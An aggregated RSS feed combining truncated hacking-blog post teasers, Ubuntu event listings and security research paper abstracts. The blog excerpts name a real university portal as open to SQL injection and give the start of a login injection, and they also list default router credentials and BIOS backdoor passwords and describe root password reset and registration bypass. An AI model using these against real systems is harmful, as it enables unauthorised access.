http://www.thehackerslibrary.com/?feed=rss About the university: Sikkim Manipal is one of the largest private universities in India. The Institute attracts students from all over the country, with over 1700 students enrolled in the various engineering disciplines. 102 full-time faculty members are employed. Type of problem: SQL Injection Vulnerable Portal: http://portal.smude.edu.in/ User Name: sanjay any name will Password: ‘ [...]

==> Future is Open Source…………………..NOT !

http://www.thehackerslibrary.com/?feed=rss We have been hearing these things for years, that open source is the future of the world, everything will be open source in future, but I don’t think it is possible in a logical way. I know I sound very strange and against the majority, but I know whatever point and example I am going to [...]

==> Heap Overflows: Ancient Art of Unlink Seduction

http://www.thehackerslibrary.com/?feed=rss Hi, Here’s an article which introduces the earlier techniques of Heap Overflows. I find that it is almost mandatory to understand these basic, albeit useful, techniques. Dynamic Memory Allocation and the Heap The data associated with a program in memory can be allocated to one of 3 areas: (a) The data segment for global data, [...]

==> Cracking Router Password

http://www.thehackerslibrary.com/?feed=rss In this tutorial we will use Brutus, but you can use any brute forcer. So download Brutus from the link below: http://www.hoobie.net/brutus/brutus-download.html Step 1 – when we try to access our router it will ask for an id and password; we can use some of the default id/password pairs like admin:admin, admin:12345 etc. ………….. Step 2 – now [...]

==> Google Hacking Part 2

http://www.thehackerslibrary.com/?feed=rss As in the first part arbu posted about the basics of Google hacking, in this part I’m just going to put some of the basic important Google dorks only that a hacker uses. This article is only for educational purpose so if any one misuses it that will not be my responsibility or this [...]

==> Code Classics

http://www.thehackerslibrary.com/?feed=rss A few anecdotes about code snippets that range from the craziest to the most elegant. Cryptic quote by Kawigi: double m[]= {7709179928849219.0, 771};int main(){m[1]--?m[0]*=2,main():printf(m);} This cryptic code when run outputs “C++ sucks”. A Quine is a computer program which produces a copy of its own source code as its only output. main() { [...]

==> ARP Poisoning -ARP Spoofing :Info And Defense

http://www.thehackerslibrary.com/?feed=rss Article taken from: Sean Whalen (http://www.rootsecure.net/content/downloads/pdf/arp_spoofing_intro.pdf) This article is for educational purpose only; if someone misuses the information then the author or site admin is not responsible for it. Introduction A computer connected to an IP/Ethernet LAN has two addresses. One is the address of the network card, called the MAC address. The MAC, in [...]

==> Cross Website Scripting(XSS) Info and Prevention

http://www.thehackerslibrary.com/?feed=rss So here I’m gonna write an article over XSS aka cross website scripting. Some declaration: this article is only meant for educational purpose; if someone uses it for a wrong purpose then THL is not responsible for it. Note: since THL is not going to show the codes, I modified them; now [...]

==> Restoring lost partitions using Ubuntu live CD

http://www.thehackerslibrary.com/?feed=rss FAQ: How do I restore my lost partition table? I accidentally deleted my partition table, how do I recover my data? How to recover deleted partitions and data in them? Recover data from deleted drives. WARNING: If you’ve formatted and/or added new data to the drive, or carried on with an OS installation, chances of [...]

==> DDoS Attacks and DDoS Defense Mechanisms

http://www.thehackerslibrary.com/?feed=rss Introduction Distributed denial-of-service attacks (DDoS) pose an immense threat to the Internet, and consequently many defense mechanisms have been proposed to combat them. Attackers constantly modify their tools to bypass these security systems, and researchers in turn modify their approaches to handle new attacks. The DDoS field is evolving quickly, and it is becoming increasingly hard [...]

==> Unable To See Hidden Files

http://www.thehackerslibrary.com/?feed=rss We must have usually faced a problem that we cannot ‘view the hidden files’, even after selecting the option from the Folder Options Menu, and when we go back to check, we see that it has been mysteriously restored to ‘Do Not Show Hidden Files & Folders’. It happens due to a small bug/virus which [...]

==> Practical Compiler Development Part 1

http://www.thehackerslibrary.com/?feed=rss Practical Compiler Development Tutorial Part 1 This is a rather informal introduction to development of a hobby compiler. The more formal chapters on compiler development will be given in later tutorials. By the end of this tutorial you will be able to create a simple interpreter. This can be easily converted into [...]

==> Dynamic DLL Injection

http://www.thehackerslibrary.com/?feed=rss As in my previous post I described static DLL injection, now we will look at dynamic DLL injection, which is mostly used by Trojans. After a program has been executed, a process is created in the OS. When an attacker attempts to load code into the process memory space, then the attacker [...]

==> Quantum Computing the new Horizon in Computing History

http://www.thehackerslibrary.com/?feed=rss The massive amount of processing power generated by computer manufacturers has not yet been able to quench our thirst for speed and computing capacity. In 1947, American computer engineer Howard Aiken said that just six electronic digital computers would satisfy the computing needs of the United States. Others have made similar errant predictions about the [...]

==> Semantic E-mail Delivery: The Future of E-mail?

http://www.thehackerslibrary.com/?feed=rss Smart email figures out who should get messages. New cutting edge technology? Or just another waste of time? Perhaps you might discover a life-changing potential, so stay tuned. A prototype e-mail system being tested at Stanford University later this year will radically change how users specify where their messages are supposed to be delivered. [...]

==> Spyware – A Threat To Your Privacy:Info and Defence

http://www.thehackerslibrary.com/?feed=rss What is spyware? Spyware is Internet jargon for Advertising Supported software (Adware). It is a way for shareware authors to make money from a product, other than by selling it to the users. Technically it is software which spies on you; it spies on your music habits (just like Google is spying on your [...]

==> Buffer Over Flow Attack

http://www.thehackerslibrary.com/?feed=rss If you are reading this post then you definitely have some idea about computer programming and processes. A computer program executes various processes and goes on balancing equations for which it has been created. In the new era of programming we generally see that companies recruit only those programmers who are efficient in programming. Now [...]

==> CAIN and ABEL Tutorial 4

http://www.thehackerslibrary.com/?feed=rss This will contain Network Enumerator Promiscuous-mode scanner Sniffer SQL Server 2000 Password Extractor Traceroute Network Enumerator The Network Enumerator uses the native Windows network management functions (Net*) to discover what is present on the network. It allows a quick identification of Domain Controllers, SQL Servers, Printer Servers, Remote Access Dial-In Servers, Novell Servers, Apple File [...]

==> Hotlinking and Bandwidth Theft

http://www.thehackerslibrary.com/?feed=rss The internet is going at a pretty fast pace. We can also find bloggers, webmasters and website developers among ourselves these days. This is an important reason for me to write this post. Before proceeding let me give a small introduction about what actually I have posted here. Introduction Bandwidth theft does not mean cracking [...]

==> CAIN and ABEL Tutorial 3

http://www.thehackerslibrary.com/?feed=rss This part of the tutorial will contain Certificates Collector Cisco Config Downloader/Uploader Mac Scanner Certificates Collector Cain’s Certificates Collector grabs server certificates from HTTPS web sites and prepares them for APR-HTTPS. The feature is automatically used by the HTTPS sniffer filter but you can also use it manually to create a list of pre-calculated fake [...]

==> CAIN and ABEL Tutorial 2

http://www.thehackerslibrary.com/?feed=rss This part of the tutorial will cover: ARP Poison Routing APR-HTTPS APR APR (ARP Poison Routing) is a main feature of the program. It enables sniffing on switched networks and the hijacking of IP traffic between hosts. The name “ARP Poison Routing” derives from the two steps needed to perform such unusual network sniffing: an [...]

==> CAIN and ABEL Tutorial 1

http://www.thehackerslibrary.com/?feed=rss This tutorial will cover (version 4.9.8) INTRODUCTION Cain is an easy application to install and configure. However, there are several powerful tools that should only be configured after you fully understand both the capabilities and consequences to the application and the target network. After all, you can’t very well hack a network if you take [...]

==> The PE Format

http://www.thehackerslibrary.com/?feed=rss Warning: This document contains purely technical information. This can be considered as iron, out of which weapons can be made. Additionally, this is about 48 pages long and written by me. Introduction: Windows uses the Portable Executable Format to store executable files, also known as an “image” of an executable. Although the PE [...]

==> BandWidth Explained

http://www.thehackerslibrary.com/?feed=rss BandWidth Explained Most hosting companies offer a variety of bandwidth options in their plans. So exactly what is bandwidth as it relates to web hosting? Put simply, bandwidth is the amount of traffic that is allowed to occur between your web site and the rest of the internet. The amount of bandwidth a hosting company [...]

==> GMAIL Search Query

http://www.thehackerslibrary.com/?feed=rss Gmail Search Syntax Gmail offers a rich search syntax for routing through your email message travel through the headers of your email message archive in search of mail sent by someone matching the keyword you provide: from:arbabusmani@gmail.com finds all messages sent to someone matching a provided keyword. (Don’t forget plus-addressing) to:usmani.arbab@yahoo.com to:hacking+books@gmail.com Match messages with [...]

==> Intrusion Detection Systems [IDS]

http://www.thehackerslibrary.com/?feed=rss An intrusion detection system (IDS) is a software and/or hardware based system that monitors network traffic for suspicious activity and alerts the system or network administrator in case it detects some intrusion attempt from an external source into a private network. In some cases the IDS may also respond to anomalous or malicious traffic [...]

==> Google Hacking

http://www.thehackerslibrary.com/?feed=rss Use Google as a warez search engine a.k.a Get Free Stuff! 1. Go to www.google.com 2. In the Search Bar type in: “intitle:index of” and then type in the keyword for whatever you are looking for. So for example if I want to find some Linkin Park songs I would type in this: “intitle:index of” LINKIN PARK (OR SONG [...]

==> Gmail Themes are here!!!

http://www.thehackerslibrary.com/?feed=rss Hi All, The Themes for GMAIL are here. Though there is no official word from Google or the Gmail team in the Google blog yet, a few people across the globe saw their Gmail with themes and a new tab saying Themes in the settings page. The settings page can be reached at http://mail.google.com/mail/#settings/themes and go to http://mail.google.com/support/bin/answer.py?hl=en&ctx=mail&answer=112508 for [...]

==> Practical Hashing

http://www.thehackerslibrary.com/?feed=rss This is my first blog here and this will be about cryptographic hash functions. I have chosen this as the topic for my first post as hashing functions are very common in the field of cryptography, which is an area of interest of mine. A hash function takes a string of bits or bytes as [...]

==> Some linux commands

http://www.thehackerslibrary.com/?feed=rss Starting & Stopping shutdown -h now Shutdown the system now and do not reboot halt Stop all processes – same as above shutdown -r 5 Shutdown the system in 5 minutes and reboot shutdown -r now Shutdown the system now and reboot reboot Stop all processes and then reboot – same as above startx Start [...]

==> GUI Toolkits compared

http://www.thehackerslibrary.com/?feed=rss GUI Toolkits Compared I have worked with a few UI libraries during my college days (late night hackwork!). Although it has been months since I really coded something in C/C++. Here is my opinion on most of the UI frameworks (choices available). (a) Win32 API, GDI (user32.dll) This was the [...]

==> The New Era of Eavesdropping

http://www.thehackerslibrary.com/?feed=rss You all must have heard about keyloggers. You can log the keystrokes using keyloggers working as a hidden background service at the victim’s computer. Just imagine a case: you think your system is secure as it’s not having any keylogger and you’ve thoroughly scanned the background services and there is no suspicious service running behind as [...]

==> DNA Computing

http://www.thehackerslibrary.com/?feed=rss Silicon has been successful for years as a computing material. Almost every computer in the world has silicon in it. Probably we can’t imagine a computer without silicon. So what is special in it? The answer lies in its structure, which makes it a very special material for computers. But that is not our concern here. [...]

==> Port Scanning

http://www.thehackerslibrary.com/?feed=rss Port Scanning: Port scanning is the process of connecting to TCP and UDP ports on a target system to determine what services are running or in a LISTENING state. Identifying listening ports is critical to determine the type of operating system and applications in use. Active services that are listening may allow an unauthorized user [...]

==> BIOS Password Hack

http://www.thehackerslibrary.com/?feed=rss Standard BIOS backdoor passwords The first, less invasive, attempt to bypass a BIOS password is to try one of these standard manufacturer’s backdoor passwords: AWARD BIOS AWARD SW, AWARD_SW, Award SW, AWARD PW, _award, awkward, J64, j256, j262, j332, j322, 01322222, 589589, 589721, 595595, 598598, HLT, SER, SKY_FOX, aLLy, aLLY, Condo, CONCAT, TTPTHA, aPAf, HLT, [...]

==> Resetting Root Authorization in Linux and Prevention

http://www.thehackerslibrary.com/?feed=rss The root authentication can be reset to a NULL value with the following method. Do not use this information for committing cyber crimes. At the GRUB loader, highlight the desired kernel which you want to boot, ‘fedora core fc9′, press ‘e’ to edit the run levels and other options; then the second menu arrives as .. (hd0,1) [...]

==> Firefox v/s Chrome

http://www.thehackerslibrary.com/?feed=rss * Post Updated, Must Read * Google Chrome’s release makes a big dust in the internet world. Mozilla is feeling big pressure about that. However, Mozilla has not hit the panic button yet, because they released a number of benchmarks showing Firefox 3.1 will be faster than anything Google can muster with Chrome. Google claims [...]

==> How to Bypass Mandatory Free Registrations

http://www.thehackerslibrary.com/?feed=rss Do you really get annoyed when asked for FREE REGISTRATIONS by many websites without which you cannot proceed further? Everyone who uses internet regularly must have faced this and must be knowing how annoying this is. Registering means, you have to give your personal details, which can result in SPAM, Promotion emails, Identity Theft etc. [...]

==> The Open Cloud Webinars: Stability, support and the latest cloud features: using the Ubuntu Cloud Archive

http://www.ubuntu.com/rss.xml The pace of innovation in the cloud is ferocious. And there's no better example than OpenStack - the fastest growing open source project ever, according to some reports. Join Ubuntu Server Engineering Manager Dave Walker to learn how the Ubuntu Cloud Archive provides access to the very latest OpenStack features on long-term support releases of Ubuntu. The webinar will cover the principles behind the Ubuntu Cloud Archive and its use in the enterprise, enabling you and your organisation to make the most of the open cloud. Location: Online Time: Wed, 2012-11-07 16:00

==> The Open Cloud Webinars: Running OpenStack Folsom on Ubuntu 12.10 and Ubuntu 12.04 LTS

http://www.ubuntu.com/rss.xml The second webinar of our Ubuntu 12.10 series focuses on Folsom, the latest release of OpenStack. In this webinar, Ubuntu Server Engineering Manager Dave Walker will talk you through the process of deploying Folsom on Ubuntu 12.10 and 12.04 LTS, showcasing some of the unique deployment tools that make Ubuntu the fastest route to a fully-operative, enterprise-grade OpenStack cloud. Join us, learn more and ask questions live! Location: Online Time: Wed, 2012-10-31 17:00

==> The Open Cloud Webinars: New features in Ubuntu 12.10, the world’s most cloud-friendly OS

http://www.ubuntu.com/rss.xml Another 6 months have passed, so it's time for the next Ubuntu release! Join Mark Baker, Ubuntu Server Product Manager, to find out about the new features in Ubuntu 12.10 and how you can take advantage of them. Whether you are new to Ubuntu or using it already, this webinar will give you an insight into 12.10 for both server and cloud computing. Register today and ask questions live! Location: Online Time: Tue, 2012-10-23 16:00

==> Ubuntu Enterprise Summit

http://www.ubuntu.com/rss.xml The Ubuntu Enterprise Summit is a one-day conference aimed at technologists and IT decision-makers. At this year's event, analysts and technologists will join key figures from Canonical to discuss the new best practice and the road ahead for enterprise IT. For more information and to view the agenda, visit: http://uds.ubuntu.com/enterprise-summit/ Location: Copenhagen, Denmark Time: Tue, 2012-10-30 (All day)

==> Ubuntu Developer Summit

http://www.ubuntu.com/rss.xml Come and join us for yet another fantastic, action-packed Ubuntu Developer Summit! This time, we're in Europe at the Bella Centre in Copenhagen. Registration is free and spaces are limited, so hurry! The Ubuntu Developer Summit is the event where we plan for the forthcoming version of Ubuntu. It brings together Canonical engineers, community members, partners, upstream representatives and cloud specialists, in an environment of active debate. For more information, visit: http://uds.ubuntu.com Location: Copenhagen, Denmark Time: Mon, 2012-10-29 (All day) - Thu, 2012-11-01 (All day)

==> DroidCon

http://www.ubuntu.com/rss.xml Canonical is a Partner Sponsor at the upcoming DroidCon event. Location: London, UK Time: Thu, 2012-10-25 (All day) - Fri, 2012-10-26 (All day)

==> Mass TLC: Cloud Summit

http://www.ubuntu.com/rss.xml Canonical will have a presence at Mass TLC's upcoming Cloud Summit. If you're in the area, stop by and say hello! Location: Boston, USA Time: Fri, 2012-10-19 (All day)

==> The OpenStack Summit

http://www.ubuntu.com/rss.xml Canonical is proud to be one of the premier sponsors of the OpenStack Summit. Ubuntu Founder Mark Shuttleworth will be presenting a keynote session and the Canonical team will be there, so stop by our booth and say hello! Canonical was the first company to commercially distribute and support OpenStack - and Ubuntu has remained the reference operating system for the OpenStack project since the beginning. We include it in every download and CD of Ubuntu Server, which gives us a huge interest in its continuing development. Canonical is also one of eight members of the OpenStack Foundation. Location: San Diego, USA Time: Mon, 2012-10-15 (All day) - Thu, 2012-10-18 (All day)

==> Zentyal Summit

http://www.ubuntu.com/rss.xml Canonical is proud to be a Premier Sponsor for the upcoming Zentyal Summit. Zentyal is an official Ubuntu Advantage Reseller. For more information, visit: http://events.zentyal.com/2012/10/04/zentyal-summit-2012-2/ Location: Zaragoza, Spain Time: Thu, 2012-10-04 (All day)

==> New Landscape Features and Functionality

http://www.ubuntu.com/rss.xml Landscape is the Ubuntu systems management tool, proven to save time and money when managing Ubuntu deployments at scale. Join this webinar to learn about new features including role-based access control, bare-metal provisioning and its full API, alongside reporting capabilities and other tools to give you total operational awareness. You'll gain a comprehensive insight into how Landscape's enterprise systems management and regulatory compliance functionality can help an organisation tame complexity. Location: Webinar Time: Thu, 2012-09-20 16:00

==> Using dual-mappings to evade automated unpackers

http://www.uninformed.org/uninformed.rss Automated unpackers such as Renovo, Saffron, and Pandora's Bochs attempt to dynamically unpack executables by detecting the execution of code from regions of virtual memory that have been written to. While this is an elegant method of detecting dynamic code execution, it is possible to evade these unpackers by dual-mapping physical pages to two distinct virtual address regions where one region is used as an editable mapping and the second region is used as an executable mapping. In this way, the editable mapping is written to during the unpacking process and the executable mapping is used to execute the unpacked code dynamically. This effectively evades automated unpackers which rely on detecting the execution of code from virtual addresses that have been written to.

==> Analyzing local privilege escalations in win32k

http://www.uninformed.org/uninformed.rss This paper analyzes three vulnerabilities that were found in win32k.sys that allow kernel-mode code execution. The win32k.sys driver is a major component of the GUI subsystem in the Windows operating system. These vulnerabilities have been reported by the author and patched in MS08-025. The first vulnerability is a kernel pool overflow with an old communication mechanism called the Dynamic Data Exchange (DDE) protocol. The second vulnerability involves improper use of the ProbeForWrite function within string management functions. The third vulnerability concerns how win32k handles system menu functions. Their discovery and exploitation are covered.

==> Exploiting Tomorrow's Internet Today: Penetration testing with IPv6

http://www.uninformed.org/uninformed.rss This paper illustrates how IPv6-enabled systems with link-local and auto-configured addresses can be compromised using existing security tools. While most of the techniques described can apply to "real" IPv6 networks, the focus of this paper is to target IPv6-enabled systems on the local network.

==> Can you find me now? Unlocking the Verizon Wireless xv6800 (HTC Titan) GPS

http://www.uninformed.org/uninformed.rss In August 2008 Verizon Wireless released a firmware upgrade for their xv6800 (rebranded HTC Titan) line of Windows Mobile smartphones that provided a number of new features previously unavailable on the device on the initial release firmware. In particular, support for accessing the device's built-in Qualcomm gpsOne assisted GPS chipset was introduced with this update. However, Verizon Wireless elected to attempt to lock down the GPS hardware on xv6800 such that only applications authorized by Verizon Wireless would be able to access the device's built-in GPS hardware and perform location-based functions (such as GPS-assisted navigation). The mechanism used to lock down the GPS hardware is entirely client-side based, however, and as such suffers from fundamental limitations in terms of how effective the lockdown can be in the face of an almost fully user-programmable Windows Mobile-based device. This article outlines the basic philosophy used to prevent unauthorized applications from accessing the GPS hardware and provides a discussion of several of the flaws inherent in the chosen design of the protection mechanism. In addition, several pitfalls relating to debugging and reverse engineering programs on Windows Mobile are also discussed. Finally, several suggested design alterations that would have mitigated some of the flaws in the current GPS lock down system from the perspective of safeguarding the privacy of user location data are also presented.

==> An Objective Analysis of the Lockdown Protection System for Battle.net

http://www.uninformed.org/uninformed.rss Near the end of 2006, Blizzard deployed the first major update to the version check and client software authentication system used to verify the authenticity of clients connecting to Battle.net using the binary game client protocol. This system had been in use since just after the release of the original Diablo game and the public launch of Battle.net. The new authentication module (Lockdown) introduced a variety of mechanisms designed to raise the bar with respect to spoofing a game client when logging on to Battle.net. In addition, the new authentication module also introduced run-time integrity checks of client binaries in memory. This is meant to provide simple detection of many client modifications (often labeled "hacks") that patch game code in-memory in order to modify game behavior. The Lockdown authentication module also introduced some anti-debugging techniques that are designed to make it more difficult to reverse engineer the module. In addition, several checks that are designed to make it difficult to simply load and run the Blizzard Lockdown module from the context of an unauthorized, non-Blizzard-game process. After all, if an attacker can simply load and run the Lockdown module in his or her own process, it becomes trivially easy to spoof the game client logon process, or to allow a modified game client to log on to Battle.net successfully. However, like any protection mechanism, the new Lockdown module is not without its flaws, some of which are discussed in detail in this paper.

==> ActiveX - Active Exploitation

http://www.uninformed.org/uninformed.rss This paper provides a general introduction to the topic of understanding software vulnerabilities that affect ActiveX controls. A brief description of how ActiveX controls are exposed to Internet Explorer is given along with an analysis of three example ActiveX vulnerabilities that have been previously disclosed.

==> Context-keyed Payload Encoding

http://www.uninformed.org/uninformed.rss A common goal of payload encoders is to evade a third-party detection mechanism which is actively observing attack traffic somewhere along the route from an attacker to their target, filtering on commonly used payload instructions. The use of a payload encoder may be easily detected and blocked as well as opening up the opportunity for the payload to be decoded for further analysis. Even so-called keyed encoders utilize easily observable, recoverable, or guessable key values in their encoding algorithm, thus making decoding on-the-fly trivial once the encoding algorithm is identified. It is feasible that an active observer may make use of the inherent functionality of the decoder stub to decode the payload of a suspected exploit in order to inspect the contents of that payload and make a control decision about the network traffic. This paper presents a new method of keying an encoder which is based entirely on contextual information that is predictable or known about the target by the attacker and constructible or recoverable by the decoder stub when executed at the target. An active observer of the attack traffic however should be unable to decode the payload due to lack of the contextual keying information.

==> Improving Software Security Analysis using Exploitation Properties

http://www.uninformed.org/uninformed.rss Reliable exploitation of security vulnerabilities has continued to become more difficult as formidable mitigations have been established and are now included by default with most modern operating systems. Future exploitation of software vulnerabilities will rely on either discovering ways to circumvent these mitigations or uncovering flaws that are not adequately protected. Since the majority of the mitigations that exist today lack universal bypass techniques, it has become more fruitful to take the latter approach. It is in this vein that this paper introduces the concept of exploitation properties and describes how they can be used to better understand the exploitability of a system irrespective of a particular vulnerability. Perceived exploitability is of utmost importance to both an attacker and to a defender given the presence of modern mitigations. The ANI vulnerability (MS07-017) is used to help illustrate these points by acting as a simple example of a vulnerability that may have been more easily identified as code that should have received additional scrutiny by taking exploitation properties into consideration.

==> Real-time Steganography with RTP

http://www.uninformed.org/uninformed.rss Real-time Transfer Protocol (RTP) is used by nearly all Voice-over-IP systems to provide the audio channel for calls. As such, it provides ample opportunity for the creation of a covert communication channel due to its very nature. While use of steganographic techniques with various audio cover-medium has been extensively researched, most applications of such have been limited to audio cover-medium of a static nature such as WAV or MP3 file audio data. This paper details a common technique for the use of steganography with audio data cover-medium, outlines the problem issues that arise when attempting to use such techniques to establish a full-duplex communications channel within audio data transmitted via an unreliable streaming protocol, and documents solutions to these problems. An implementation of the ideas discussed entitled SteganRTP is included in the reference materials.

==> OS X Kernel-mode Exploitation in a Weekend

http://www.uninformed.org/uninformed.rss Apple's Mac OS X operating system is attracting more attention from users and security researchers alike. Despite this increased interest, there is still an apparent lack of detailed vulnerability development information for OS X. This paper will attempt to help bridge this gap by walking through the entire vulnerability development process. This process starts with vulnerability discovery and ultimately finishes with remote code execution. To help illustrate this process, a real vulnerability found in the OS X wireless device driver is used.

==> A Catalog of Local Windows Kernel-mode Backdoor Techniques

http://www.uninformed.org/uninformed.rss This paper presents a detailed catalog of techniques that can be used to create local kernel-mode backdoors on Windows. These techniques include function trampolines, descriptor table hooks, model-specific register hooks, page table modifications, as well as others that have not previously been described. The majority of these techniques have been publicly known far in advance of this paper. However, at the time of this writing, there appears to be no detailed single point of reference for many of them. The intention of this paper is to provide a solid understanding on the subject of local kernel-mode backdoors. This understanding is necessary in order to encourage the thoughtful discussion of potential countermeasures and perceived advancements. In the vein of countermeasures, some additional thoughts are given to the common misconception that PatchGuard, in its current design, can be used to prevent kernel-mode rootkits.

==> Generalizing Data Flow Information

http://www.uninformed.org/uninformed.rss Generalizing information is a common method of reducing the quantity of data that must be considered during analysis. This fact has been plainly illustrated in relation to static data flow analysis where previous research has described algorithms that can be used to generalize data flow information. These generalizations have helped support more optimal data flow analysis in certain situations. In the same vein, this paper describes a process that can be employed to generalize and persist data flow information along multiple generalization tiers. Each generalization tier is meant to describe the data flow behaviors of a conceptual software element such as an instruction, a basic block, a procedure, a data type, and so on. This process makes use of algorithms described in previous literature to support the generalization of data flow information. To illustrate the usefulness of the generalization process, this paper also presents an algorithm that can be used to determine reachability at each generalization tier. The algorithm determines reachability starting from the least specific generalization tier and uses the set of reachable paths found to progressively qualify data flow information for each successive generalization tier. This helps to constrain the amount of data flow information that must be considered to a minimal subset.

==> Reducing the Effective Entropy of GS Cookies

http://www.uninformed.org/uninformed.rss This paper describes a technique that can be used to reduce the effective entropy in a given GS cookie by roughly 15 bits. This reduction is made possible because GS uses a number of weak entropy sources that can, with varying degrees of accuracy, be calculated by an attacker. It is important to note, however, that the ability to calculate the values of these sources for an arbitrary cookie currently relies on an attacker having local access to the machine, such as through the local console or through terminal services. This effectively limits the use of this technique to stack-based local privilege escalation vulnerabilities. In addition to the general entropy reduction technique, this paper discusses the amount of effective entropy that exists in services that automatically start during system boot. It is hypothesized that these services may have more predictable states of entropy due to the relative consistency of the boot process. While the techniques described in this paper do not illustrate a complete break of GS, any inherent weakness can have disastrous consequences given that GS is a static, compile-time security solution. It is not possible to simply distribute a patch. Instead, applications must be recompiled to take advantage of any security improvements. In that vein, the paper proposes some solutions that could be applied to address the problems that are outlined.

==> Memalyze: Dynamic Analysis of Memory Access Behavior in Software

http://www.uninformed.org/uninformed.rss This paper describes strategies for dynamically analyzing an application's memory access behavior. These strategies make it possible to detect when a read or write is about to occur at a given location in memory while an application is executing. An application's memory access behavior can provide additional insight into its behavior. For example, it may be able to provide an idea of how data propagates throughout the address space. Three individual strategies which can be used to intercept memory accesses are described in this paper. Each strategy makes use of a unique method of intercepting memory accesses. These methods include the use of Dynamic Binary Instrumentation (DBI), x86 hardware paging features, and x86 segmentation features. A detailed description of the design and implementation of these strategies for 32-bit versions of Windows is given. Potential uses for these analysis techniques are described in detail.

==> Mnemonic Password Formulas

http://www.uninformed.org/uninformed.rss The current information technology landscape is cluttered with a large number of information systems that each have their own individual authentication schemes. Even with single sign-on and multi-system authentication methods, systems within disparate management domains are likely to be utilized by users of various levels of involvement within the landscape as a whole. Due to this complexity and the abundance of authentication requirements, many users are required to manage numerous credentials across various systems. This has given rise to many different insecurities relating to the selection and management of passwords. This paper details a subset of issues facing users and managers of authentication systems involving passwords, discusses current approaches to mitigating those issues, and finally introduces a new method for password management and recall termed Mnemonic Password Formulas.

==> Locreate: An Anagram for Relocate

http://www.uninformed.org/uninformed.rss This paper presents a proof of concept executable packer that does not use any custom code to unpack binaries at execution time. This is different from typical packers which generally rely on packed executables containing code that is used to perform the inverse of the packing operation at runtime. Instead of depending on custom code, the technique described in this paper uses documented behavior of the dynamic loader as a mechanism for performing the unpacking operation.

==> Exploiting 802.11 Wireless Driver Vulnerabilities on Windows

http://www.uninformed.org/uninformed.rss This paper describes the process of identifying and exploiting 802.11 wireless device driver vulnerabilities on Windows. This process is described in terms of two steps: pre-exploitation and exploitation.

==> Implementing a Custom X86 Encoder

http://www.uninformed.org/uninformed.rss This paper describes the process of implementing a custom encoder for the x86 architecture. To help set the stage, the McAfee Subscription Manager ActiveX control vulnerability, which was discovered by eEye, will be used as an example of a vulnerability that requires the implementation of a custom encoder.

==> Preventing the Exploitation of SEH Overwrites

http://www.uninformed.org/uninformed.rss This paper proposes a technique that can be used to prevent the exploitation of SEH overwrites on 32-bit Windows applications without requiring any recompilation.

==> Effective Bug Discovery

http://www.uninformed.org/uninformed.rss Sophisticated methods are currently being developed and implemented for mitigating the risk of exploitable bugs. The process of researching and discovering vulnerabilities in modern code will require changes to accommodate the shift in vulnerability mitigations.

==> Wars Within

http://www.uninformed.org/uninformed.rss In this paper I will uncover the information exchange of what may be classified as one of the highest money making schemes coordinated by 'organized crime'. I will elaborate on information gathered from a third party individual directly involved in all aspects of the scheme at play.

==> Fingerprinting 802.11 Implementations via Statistical Analysis of the Duration Field

http://www.uninformed.org/uninformed.rss The research presented in this paper provides the reader with a set of algorithms and techniques that enable the user to remotely determine what chipset and device driver an 802.11 device is using.

==> Improving Automated Analysis of Windows x64 Binaries

http://www.uninformed.org/uninformed.rss As Windows x64 becomes a more prominent platform, it will become necessary to develop techniques that improve the binary analysis process. In particular, automated techniques that can ...

==> Exploiting the Otherwise Non-Exploitable on Windows

http://www.uninformed.org/uninformed.rss This paper describes a technique that can be applied in certain situations to gain arbitrary code execution through software bugs that would not otherwise be exploitable, such ...

==> Abusing Mach on Mac OS X

http://www.uninformed.org/uninformed.rss This paper discusses the security implications of Mach being integrated with the Mac OS X kernel. A few examples are used to illustrate how Mach support can be used to bypass some of the BSD security features, ...

==> GREPEXEC: Grepping Executive Objects from Pool Memory

http://www.uninformed.org/uninformed.rss As rootkits continue to evolve and become more advanced, methods that can be used to detect hidden objects must also evolve. For example, relying on system provided APIs to ...

==> Anti-Virus Software Gone Wrong

http://www.uninformed.org/uninformed.rss Anti-virus software is becoming more and more prevalent on end-user computers today. Many major computer vendors (such as Dell) bundle anti-virus software and other personal security suites in the default ...

==> Bypassing PatchGuard on Windows x64

http://www.uninformed.org/uninformed.rss The version of the Windows kernel that runs on the x64 platform has introduced a new feature, nicknamed PatchGuard, that is intended to prevent both malicious software and third-party vendors ...

==> Windows Kernel-mode Payload Fundamentals

http://www.uninformed.org/uninformed.rss This paper discusses the theoretical and practical implementations of kernel-mode payloads on Windows. At the time of this writing, kernel-mode research is generally regarded as the ...

==> Analyzing Common Binary Parser Mistakes

http://www.uninformed.org/uninformed.rss With just about one file format bug being consistently released on a weekly basis over the past six to twelve months, one can only hope developers would look and learn. The reality of it ...

==> Attacking NTLM with Precomputed Hashtables

http://www.uninformed.org/uninformed.rss Breaking encrypted passwords has been of interest to hackers for a long time, and protecting them has always been one of the biggest security problems operating systems have faced, with ...

==> Linux Improvised Userland Scheduler Virus

http://www.uninformed.org/uninformed.rss This paper discusses the combination of a userland scheduler and runtime process infection for a virus. These two concepts complete each other. The runtime process infection opens the door to ...

==> FUTo

http://www.uninformed.org/uninformed.rss Since the introduction of FU, the rootkit world has moved away from implementing system hooks to hide their presence. Because of this change in offense, a new defense had to be developed. The new algorithms ...

==> Thick Clients Gone Wrong

http://www.uninformed.org/uninformed.rss When designing thick-client based solutions, developers often suffer from the incorrect assumption that end-users are incapable of modifying, examining, or emulating the packaged client. Throughout this document, ...

==> Inside Blizzard: Battle.net

http://www.uninformed.org/uninformed.rss This paper intends to describe a variety of the problems Blizzard Entertainment has encountered from a practical standpoint through their implementation of the large-scale online game matchmaking and chat ...

==> Temporal Return Addresses

http://www.uninformed.org/uninformed.rss Nearly all existing exploitation vectors depend on some knowledge of a process' address space prior to an attack in order to gain meaningful control of execution flow. In cases where this is necessary, exploit ...

==> Bypassing Windows Hardware-enforced DEP

http://www.uninformed.org/uninformed.rss This paper describes a technique that can be used to bypass Windows hardware-enforced Data Execution Prevention (DEP) on default installations of Windows XP Service Pack 2 and Windows 2003 Server Service Pack 1. This technique makes it possible to execute ...

==> 802.11 VLANs and Association Redirection

http://www.uninformed.org/uninformed.rss The goal of this paper is to introduce the reader to a technique that could be used to implement something analogous to VLANs found in wired media into a typical IEEE 802.11 environment. ...

==> Introduction to Reverse Engineering Win32 Applications

http://www.uninformed.org/uninformed.rss During the course of this paper the reader will be (re)introduced to many concepts and tools essential to understanding and controlling native Win32 applications through the eyes of ...

==> Post-Exploitation on Windows using ActiveX Controls

http://www.uninformed.org/uninformed.rss When exploiting software vulnerabilities it is sometimes impossible to build direct communication channels between a target machine and an attacker's machine due to restrictive outbound ...

